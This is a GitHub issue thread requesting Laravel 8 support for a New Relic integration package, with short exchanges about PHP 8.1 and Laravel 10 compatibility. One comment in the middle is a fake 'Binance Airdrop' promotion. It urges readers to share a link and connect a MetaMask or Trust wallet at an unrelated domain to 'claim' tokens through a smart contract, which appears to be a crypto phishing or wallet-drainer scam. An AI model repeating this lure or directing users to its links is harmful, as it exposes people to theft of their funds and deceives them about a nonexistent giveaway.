### ISSUE TITLE
Feature request: Laravel 8 support.

### ISSUE THREAD

**Issue by ansien** [JackWH/laravel-new-relic#2]
Some of our "massive" applications still run on Laravel 8.

As far as I can see there is no reason to only support Laravel 9.

Would adding Laravel 8 support be a possibility?

Thanks!

**Comment by jackwh** [comment]
Agreed, no reason it shouldn't work on Laravel 8. Before I go updating version constraints, are you running Laravel 8 under PHP 8.1? I think I'm using some 8.1-specific syntax, if memory serves...

**Comment by ansien** [comment]
Yes running 8.1 everywhere.

**Comment by friday-deployer** [comment]
please Laravel 9 🙏🙏

**Comment by softuvo** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)

### 2. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 3. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

**Comment by fruitl00p** [comment]
From what i gather, it should already be L10 compatible. @JackWH could you close this issue to prevent further confusion?
